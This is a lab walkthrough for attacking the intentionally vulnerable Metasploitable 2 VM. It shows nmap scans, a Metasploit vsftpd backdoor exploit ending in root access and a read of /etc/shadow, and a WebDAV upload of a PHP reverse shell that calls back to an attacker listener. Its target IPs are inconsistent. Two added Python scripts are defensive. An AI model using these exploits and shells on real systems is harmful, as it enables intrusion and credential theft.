
Metasploitable

The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed
for testing security tools and demonstrating common vulnerabilities. Version 2 of this virtual
machine is available for download and ships with even more vulnerabilities than the original image.
This virtual machine is compatible with VMware, VirtualBox, and other common virtualization
platforms. By default, Metasploitable’s network interfaces should never be exposed to a hostile
network.

This VM can be used to conduct security training, test security tools, and practice common
penetration testing techniques.

1. Installation and configuration

This walkthrough targets Metasploitable 2 (a deliberately vulnerable machine for penetration-testing practice).

Installation process:

1. Open VirtualBox and click the “New” button to create a new virtual machine.

2. Type the virtual machine name (Metasploitable2).

3. Allocate memory (more is preferable, but not below 512 MB).

4. Select “Use an existing hard disk file”.

5. Select the .vmdk file you downloaded from Rapid7.

6. Click “Create”. Metasploitable2 is now installed; next, configure the network settings.

After installation, change the network adapter settings as follows:

In the network settings (Settings/Network/Adapter), select Ethernet or Wireless.

In the Advanced tab, set Promiscuous Mode to “Allow All”.

Boot the Metasploitable2 machine and log in using the credentials shown on the login banner.
Find the machine’s IP address by running the following command in the terminal:

ifconfig

That’s all for the setup. Let’s start hacking.


2. Walkthrough

NMAP Scanning

Scanning Metasploitable 2

What is Nmap?

Nmap, short for Network Mapper, is a network discovery and security auditing tool. It is known for
its simple, easy-to-remember flags that provide powerful scanning options. Nmap is widely used
by network administrators to:

• Find open ports and services

• Discover services along with their versions

• Guess the operating system running on a target machine

• Get accurate packet routes to the target machine

• Monitor hosts

As noted from ifconfig above, the IP address of the machine is 192.168.0.130.

Let’s begin scanning with Nmap, which is part of Kali Linux.

Example 1

nmap -sV -p- 192.168.0.130

Example 2

A preliminary nmap scan reveals services:

root@kali:~# nmap -sV -O 192.168.0.130 -p1-65535

Starting Nmap 6.47 ( http://nmap.org ) at 2015-06-14 17:35 MDT
Nmap scan report for 192.168.0.14
Host is up (0.00051s latency).
Not shown: 65505 closed ports
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 2.3.4
22/tcp    open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp    open  telnet      Linux telnetd
25/tcp    open  smtp        Postfix smtpd
53/tcp    open  domain      ISC BIND 9.4.2
80/tcp    open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp   open  rpcbind     2 (RPC #100000)
139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp   open  exec        netkit-rsh rexecd
513/tcp   open  login?
514/tcp   open  tcpwrapped
1099/tcp  open  rmiregistry GNU Classpath grmiregistry
1524/tcp  open  shell       Metasploitable root shell
2049/tcp  open  nfs         2-4 (RPC #100003)
2121/tcp  open  ftp         ProFTPD 1.3.1
3306/tcp  open  mysql       MySQL 5.0.51a-3ubuntu5
3632/tcp  open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp  open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp  open  vnc         VNC (protocol 3.3)
6000/tcp  open  X11         (access denied)
6667/tcp  open  irc         Unreal ircd
6697/tcp  open  irc         Unreal ircd
8009/tcp  open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
8787/tcp  open  drb         Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
32907/tcp open  unknown
40627/tcp open  status      1 (RPC #100024)
41759/tcp open  nlockmgr    1-4 (RPC #100021)
57859/tcp open  mountd      1-3 (RPC #100005)
MAC Address: 08:00:27:E9:91:67 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 172.46 seconds

Example 3

Open a terminal window on your Backtrack system and type:

nmap -v -A 192.168.0.130

This will show us the open ports and try to enumerate what services are running. Here is a look at
the ports:
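As an added example (not part of the original walkthrough): a small Python parser for the port table that nmap -sV prints, turning the scan into an inventory and flagging the services a defender would ticket first. The sample scan text is constructed in the same format as the report above, and the cleartext-service and known-bad-version lists are assumptions chosen from that report.

```python
import re
from dataclasses import dataclass

# Constructed sample in the format nmap -sV prints (same shape as the scan
# above, not a saved copy of it).
SAMPLE_SCAN = """\
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.3.4
22/tcp   open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet  Linux telnetd
80/tcp   open  http    Apache httpd 2.2.8 ((Ubuntu) DAV/2)
513/tcp  open  login?
1524/tcp open  shell   Metasploitable root shell
5900/tcp open  vnc     VNC (protocol 3.3)
"""

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")

# Service names that imply cleartext or unauthenticated access, plus version
# strings tied to a known backdoor (the one section 3 exploits). Assumed lists.
CLEARTEXT = {"ftp", "telnet", "exec", "login", "shell", "vnc"}
KNOWN_BAD = {"vsftpd 2.3.4": "backdoored vsftpd release (vsftpd_234_backdoor)"}

@dataclass
class Service:
    port: int
    proto: str
    state: str
    name: str
    version: str

def parse_nmap(text):
    # Keep only the port table; header, OS guess and timing lines are skipped.
    services = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m:
            continue
        port, proto, state, name, version = m.groups()
        # nmap appends '?' when the service name is only a guess
        services.append(Service(int(port), proto, state, name.rstrip("?"), version or ""))
    return services

def risky_services(services):
    # Return (port, reason) pairs that belong in a remediation ticket.
    findings = []
    for s in services:
        if s.state != "open":
            continue
        bad = next((v for k, v in KNOWN_BAD.items() if s.version.startswith(k)), None)
        if bad:
            findings.append((s.port, bad))
        elif s.name in CLEARTEXT:
            findings.append((s.port, f"cleartext or unauthenticated service: {s.name}"))
        elif s.name == "http" and "DAV/" in s.version:
            findings.append((s.port, "WebDAV enabled: verify PUT/MKCOL require authentication"))
    return sorted(findings)

for port, reason in risky_services(parse_nmap(SAMPLE_SCAN)):
    print(f"{port:>5}  {reason}")
```

Feed it the saved output of the full scan above (nmap -oN) and the same logic applies to all 30 ports.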
3. VSFTPD Exploitation (Port 21)

At the command prompt, type msfconsole and Metasploit will start up. Then run:

msf5 > search vsftpd

use exploit/unix/ftp/vsftpd_234_backdoor

show options

set RHOSTS 192.168.0.130

exploit (or run)

Type whoami:

root

You now have root access.

Checking privileges, type id:

uid=0(root) gid=0(root)

Reading /etc/shadow:

cat /etc/shadow
4. Exploit WebDAV on a Server & Get a Shell

Step 1

Check if WebDAV Is Enabled

The first thing we need to do is check if WebDAV is enabled on the target. Metasploit has a scanner
we can use to do so, so fire it up by typing msfconsole in the terminal. Then, we can locate the
module using the search command:

msf5 > search webdav

Matching Modules
================

#   Name  Disclosure Date  Rank  Check  Description
-   ----  ---------------  ----  -----  -----------
0   auxiliary/scanner/http/dir_webdav_unicode_bypass  normal  Yes  MS09-020 IIS6 WebDAV Unicode Auth Bypass Directory Scanner
1   auxiliary/scanner/http/ms09_020_webdav_unicode_bypass  normal  Yes  MS09-020 IIS6 WebDAV Unicode Authentication Bypass
2   auxiliary/scanner/http/webdav_internal_ip  normal  Yes  HTTP WebDAV Internal IP Scanner
3   auxiliary/scanner/http/webdav_scanner  normal  Yes  HTTP WebDAV Scanner
4   auxiliary/scanner/http/webdav_website_content  normal  Yes  HTTP WebDAV Website Content Scanner
5   exploit/multi/http/sun_jsws_dav_options  2010-01-20  great  Yes  Sun Java System Web Server WebDAV OPTIONS Buffer Overflow
6   exploit/multi/svn/svnserve_date  2004-05-19  average  No  Subversion Date Svnserve
7   exploit/osx/browser/safari_file_policy  2011-10-12  normal  No  Apple Safari file:// Arbitrary Code Execution
8   exploit/windows/browser/java_ws_arginject_altjvm  2010-04-09  excellent  No  Sun Java Web Start Plugin Command Line Argument Injection
9   exploit/windows/browser/java_ws_double_quote  2012-10-16  excellent  No  Sun Java Web Start Double Quote Injection
10  exploit/windows/browser/java_ws_vmargs  2012-02-14  excellent  No  Sun Java Web Start Plugin Command Line Argument Injection
11  exploit/windows/browser/keyhelp_launchtripane_exec  2012-06-26  excellent  No  KeyHelp ActiveX LaunchTriPane Remote Code Execution Vulnerability
12  exploit/windows/browser/ms07_017_ani_loadimage_chunksize  2007-03-28  great  No  Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)
13  exploit/windows/browser/ms10_022_ie_vbscript_winhlp32  2010-02-26  great  No  MS10-022 Microsoft Internet Explorer Winhlp32.exe MsgBox Code Execution
14  exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec  2010-06-09  excellent  No  Microsoft Help Center XSS and Command Execution
15  exploit/windows/browser/ms10_046_shortcut_icon_dllloader  2010-07-16  excellent  No  Microsoft Windows Shell LNK Code Execution
16  exploit/windows/browser/oracle_webcenter_checkoutandopen  2013-04-16  excellent  No  Oracle WebCenter Content CheckOutAndOpen.dll ActiveX Remote Code Execution
17  exploit/windows/browser/ubisoft_uplay_cmd_exec  2012-07-29  normal  No  Ubisoft uplay 2.0.3 ActiveX Control Arbitrary Code Execution
18  exploit/windows/browser/webdav_dll_hijacker  2010-08-18  manual  No  WebDAV Application DLL Hijacker
19  exploit/windows/http/sap_host_control_cmd_exec  2012-08-14  average  Yes  SAP NetWeaver HostControl Command Injection
20  exploit/windows/http/xampp_webdav_upload_php  2012-01-14  excellent  No  XAMPP WebDAV PHP Upload
21  exploit/windows/iis/iis_webdav_scstoragepathfromurl  2017-03-26  manual  Yes  Microsoft IIS WebDav ScStoragePathFromUrl Overflow
22  exploit/windows/iis/iis_webdav_upload_asp  2004-12-31  excellent  No  Microsoft IIS WebDAV Write Access Code Execution
23  exploit/windows/iis/ms03_007_ntdll_webdav  2003-05-30  great  Yes  MS03-007 Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow
24  exploit/windows/local/ms16_016_webdav  2016-02-09  excellent  Yes  MS16-016 mrxdav.sys WebDav Local Privilege Escalation
25  exploit/windows/misc/ibm_director_cim_dllinject  2009-03-10  excellent  Yes  IBM System Director Agent DLL Injection
26  exploit/windows/misc/vmhgfs_webdav_dll_sideload  2016-08-05  normal  No  DLL Side Loading Vulnerability in VMware Host Guest Client Redirector
27  exploit/windows/misc/webdav_delivery  1999-01-01  manual  No  Serve DLL via webdav server
28  exploit/windows/scada/ge_proficy_cimplicity_gefebt  2014-01-23  excellent  Yes  GE Proficy CIMPLICITY gefebt.exe Remote Code Execution
29  exploit/windows/ssl/ms04_011_pct  2004-04-13  average  No  MS04-011 Microsoft Private Communications Transport Overflow
30  post/windows/escalate/droplnk  normal  No  Windows Escalate SMB Icon LNK Dropper

We want the webdav_scanner module, so load it with the use command:

msf5 > use auxiliary/scanner/http/webdav_scanner

Now, we can take a look at the options for this module:

msf5 auxiliary(scanner/http/webdav_scanner) > options

Module options (auxiliary/scanner/http/webdav_scanner):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   PATH     /                yes       Path to use
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   THREADS  1                yes       The number of concurrent threads
   VHOST                     no        HTTP server virtual host

We now want to set the path to /dav/, a directory commonly used for WebDAV:

msf5 auxiliary(scanner/http/webdav_scanner) > set path /dav/

path => /dav/

Next, we can set rhosts to the IP address of our target:

msf5 auxiliary(scanner/http/webdav_scanner) > set rhosts 10.10.0.50

rhosts => 10.10.0.50

We should be good to go, so type run to launch the module:

msf5 auxiliary(scanner/http/webdav_scanner) > run

[+] 10.10.0.50 (Apache/2.2.8 (Ubuntu) DAV/2) has WEBDAV ENABLED

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

The scanner will return some HTTP information, including the Apache version number and whether
WebDAV is enabled or not. As we can see above, it is indeed enabled on our target.

Step 2

Test File Permissions with DAVTest

The next thing we'll want to do is test the permissions and file execution policies on the server.
Remember, our ultimate goal here is to obtain a reverse shell, so we need to know what we're
walking into.
DAVTest is a handy tool that will automatically test these things out for us. Simply type davtest in
the terminal to see the help and usage example:

~# davtest
ERROR: Missing -url

/usr/bin/davtest -url <url> [options]

 -auth+        Authorization (user:password)
 -cleanup      delete everything uploaded when done
 -directory+   postfix portion of directory to create
 -debug+       DAV debug level 1-3 (2 & 3 log req/resp to /tmp/perldav_debug.txt)
 -move         PUT text files then MOVE to executable
 -nocreate     don't create a directory
 -quiet        only print out summary
 -rand+        use this instead of a random string for filenames
 -sendbd+      send backdoors:
                 auto - for any succeeded test
                 ext  - extension matching file name(s) in backdoors/ dir
 -uploadfile+  upload this file (requires -uploadloc)
 -uploadloc+   upload file to this location/name (requires -uploadfile)
 -url+         url of DAV location

Example: /usr/bin/davtest -url http://localhost/davdir

At the most basic level, all we need to do is provide it with a valid URL pointing to an instance of
WebDAV. Naturally, use the -url switch followed by the correct URL.

Here, we can see the tool work its magic. It begins by testing the connection and attempts to create
a test directory, which we see is a success. Next, DAVTest will send a variety of different types of files
to determine what can be uploaded. It looks like all of these succeed.

~# davtest -url http://10.10.0.50/dav
********************************************************
 Testing DAV connection
OPEN            SUCCEED:        http://10.10.0.50/dav
********************************************************
NOTE    Random string for this session: 6WDIVTY
********************************************************
 Creating directory
MKCOL           SUCCEED:                Created http://10.10.0.50/dav/DavTestDir_6WDIVTY
********************************************************
 Sending test files
PUT     asp     SUCCEED:        http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.asp
PUT     txt     SUCCEED:        http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.txt
PUT     php     SUCCEED:        http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.php
PUT     jhtml   SUCCEED:        http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.jhtml
PUT     aspx    SUCCEED:        http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.aspx
PUT     cgi     SUCCEED:        http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.cgi
PUT     shtml   SUCCEED:        http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.shtml
PUT     cfm     SUCCEED:        http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.cfm
PUT     html    SUCCEED:        http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.html
PUT     jsp     SUCCEED:        http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.jsp
PUT     pl      SUCCEED:        http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.pl
********************************************************
 Checking for test file execution
EXEC    asp     FAIL
EXEC    txt     SUCCEED:        http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.txt
EXEC    php     SUCCEED:        http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.php
EXEC    jhtml   FAIL
EXEC    aspx    FAIL
EXEC    cgi     FAIL
EXEC    shtml   FAIL
EXEC    cfm     FAIL
EXEC    html    SUCCEED:        http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.html
EXEC    jsp     FAIL
EXEC    pl      FAIL

********************************************************
/usr/bin/davtest Summary:
Created: http://10.10.0.50/dav/DavTestDir_6WDIVTY
PUT File: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.asp
PUT File: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.txt
PUT File: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.php
PUT File: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.jhtml
PUT File: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.aspx
PUT File: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.cgi
PUT File: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.shtml
PUT File: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.cfm
PUT File: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.html
PUT File: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.jsp
PUT File: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.pl
Executes: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.txt
Executes: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.php
Executes: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.html

Toward the end of the output above, we see the good stuff: testing for file execution. We can see
that most of them fail, but TXT, HTML, and perhaps the most important for us, PHP files, will all
successfully execute. All we need to do now is find a way to upload our shell.

Step 3

Upload the Shell Using Cadaver

For the final stage of our attack, we will use a tool called Cadaver, which offers an intuitive interface
for interacting with the WebDAV service — with FTP-like commands that are simple to use.

We can view the help and usage information by typing cadaver -h in the terminal:

~# cadaver -h
Usage: cadaver [OPTIONS] http://hostname[:port]/path
  Port defaults to 80, path defaults to '/'
Options:
  -t, --tolerant            Allow cd/open into non-WebDAV enabled collection.
  -r, --rcfile=FILE         Read script from FILE instead of ~/.cadaverrc.
  -p, --proxy=PROXY[:PORT]  Use proxy host PROXY and optional proxy port PORT.
  -V, --version             Display version information.
  -h, --help                Display this help message.
Please send bug reports and feature requests to <cadaver@webdav.org>

Let's test it out with a harmless text file before we jump to uploading our shell. First, create a simple
text file:

root@drd:~# echo 'TESTING' > test.txt


Next, we can connect to WebDAV via Cadaver by supplying the appropriate URL:

~# cadaver http://10.10.0.50/dav

dav:/dav/>

To get a list of available commands, type ? or help at the prompt:

dav:/dav/> ?
Available commands:
 ls         cd          pwd         put         get         mget        mput
 edit       less        mkcol       cat         delete      rmcol       copy
 move       lock        unlock      discover    steal       showlocks   version
 checkin    checkout    uncheckout  history     label       propnames   chexec
 propget    propdel     propset     search      set         open        close
 echo       quit        unset       lcd         lls         lpwd        logout
 help       describe    about
Aliases: rm=delete, mkdir=mkcol, mv=move, cp=copy, more=less, quit=exit=bye

We can use the put command to upload our test file:

dav:/dav/> put test.txt

Uploading test.txt to `/dav/test.txt':

Progress: [=============================>] 100.0% of 8 bytes succeeded.

Now, if we navigate to it in the browser, we should see the text displayed to us.

Since we are now confident that uploading will work, we can quit Cadaver for now so we can get our
shell ready:

dav:/dav/> quit
Connection to `10.10.0.50' closed.

Kali contains a variety of shells in the /usr/share/webshells/ directory. We want the PHP reverse
shell, so copy it to our current directory with the following command:

~# cp /usr/share/webshells/php/php-reverse-shell.php .

Next, we need to edit a couple of things, so open the file with your favorite text editor and change
the IP address to that of our local machine, as well as the port to a port of your choosing:

set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.0.1';  // CHANGE THIS
$port = 7777;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

Save the file, and set up a listener with Netcat to catch the incoming connection:

~# nc -lvnp 7777
listening on [any] 7777 ...

In a new window or tab, connect to WebDAV again and upload our shell just like we did earlier with
the test file:

~# cadaver http://10.10.0.50/dav

dav:/dav/> put php-reverse-shell.php


Uploading php-reverse-shell.php to `/dav/php-reverse-shell.php':

Progress: [=============================>] 100.0% of 5491 bytes succeeded.

Now browse to the file; if it's successful, we should see the browser hang. Back on our listener,
we should see a connection open up from the target:

connect to [10.10.0.1] from (UNKNOWN) [10.10.0.50] 54183
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
 14:41:17 up  1:01,  1 user,  load average: 0.12, 0.08, 0.01
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0    :0.0             13:41    1:00   0.05s  0.05s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sh: no job control in this shell
sh-3.2$

We can now issue commands like whoami to confirm we have compromised the server:

sh-3.2$ whoami

www-data

Figure: Using the cadaver tool to upload the webshell.

Figure: Achieving RCE on the webserver.

From here, we would probably want to upgrade our shell and attempt to escalate privileges to root.
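As an added defensive example, not part of the original tutorial: every step of the WebDAV chain above (the DAVTest probe, the cadaver uploads, and the browser request that triggers the shell) leaves a request in the web server's access log, and this Python script shows how to pick them out. The log lines are constructed to mirror the DAVTest and cadaver requests shown above (not a real capture), and the write-method and script-extension lists are assumptions.

```python
import re

# Constructed Apache access-log lines modelled on the DAVTest and cadaver
# activity shown above (a rehearsal of the same steps, not a real capture).
SAMPLE_LOG = """\
10.10.0.1 - - [14/Jun/2015:14:40:01 -0600] "OPTIONS /dav/ HTTP/1.1" 200 - "-" "DAV.pm"
10.10.0.1 - - [14/Jun/2015:14:40:02 -0600] "MKCOL /dav/DavTestDir_6WDIVTY HTTP/1.1" 201 257 "-" "DAV.pm"
10.10.0.1 - - [14/Jun/2015:14:40:02 -0600] "PUT /dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.php HTTP/1.1" 201 281 "-" "DAV.pm"
10.10.0.1 - - [14/Jun/2015:14:40:03 -0600] "GET /dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.php HTTP/1.1" 200 7 "-" "DAV.pm"
10.10.0.1 - - [14/Jun/2015:14:41:10 -0600] "PUT /dav/test.txt HTTP/1.1" 201 261 "-" "cadaver"
10.10.0.1 - - [14/Jun/2015:14:41:15 -0600] "PUT /dav/php-reverse-shell.php HTTP/1.1" 201 277 "-" "cadaver"
10.10.0.1 - - [14/Jun/2015:14:41:17 -0600] "GET /dav/php-reverse-shell.php HTTP/1.1" 200 - "-" "Mozilla/5.0"
10.10.0.9 - - [14/Jun/2015:14:42:00 -0600] "GET /index.php HTTP/1.1" 200 891 "-" "Mozilla/5.0"
"""

# client, ident, authenticated user, timestamp, method, path, status
LOG_LINE = re.compile(r'^(\S+) \S+ (\S+) \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
WRITE_METHODS = {"PUT", "MKCOL", "MOVE", "COPY", "DELETE", "PROPPATCH"}
SCRIPT_EXT = (".php", ".cgi", ".pl", ".jsp", ".shtml")

def analyze(log_text):
    # Two things a defender wants from this log: every successful WebDAV write,
    # and any uploaded script that was later fetched (i.e. run by the server).
    writes, uploaded, executed = [], set(), []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        src, user, when, method, path, status = m.groups()
        ok = status.startswith("2")
        if method in WRITE_METHODS and ok:
            writes.append({"src": src, "user": user, "method": method, "path": path, "time": when})
            if method == "PUT" and path.lower().endswith(SCRIPT_EXT):
                uploaded.add(path)
        elif method == "GET" and ok and path in uploaded:
            executed.append({"src": src, "path": path, "time": when})
    return {"writes": writes, "executed": executed}

def unauthenticated_writes(report):
    # A '-' in the user field means Apache recorded no authenticated user:
    # exactly the misconfiguration this walkthrough relies on.
    return [w for w in report["writes"] if w["user"] == "-"]

if __name__ == "__main__":
    report = analyze(SAMPLE_LOG)
    for w in unauthenticated_writes(report):
        print(f"{w['time']} {w['src']} {w['method']} {w['path']} (no auth)")
    for e in report["executed"]:
        print(f"{e['time']} {e['src']} executed uploaded script {e['path']}")
```

The same checks run unchanged over a real /var/log/apache2/access.log; any hit in unauthenticated_writes is the finding to fix on the server (require authentication for the DAV location or disable the write methods).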

Wrapping Up

In this tutorial, we learned about WebDAV and how to exploit a misconfigured version of it to get
shell access. First, we used a Metasploit scanner to determine if WebDAV was running on the target.
Next, we were able to test file execution policies with a tool called DAVTest. Finally, we utilized
Cadaver to upload a reverse shell and compromise the server. While remote access offers a
convenient way to collaborate, hackers will always try to exploit it for their own use.
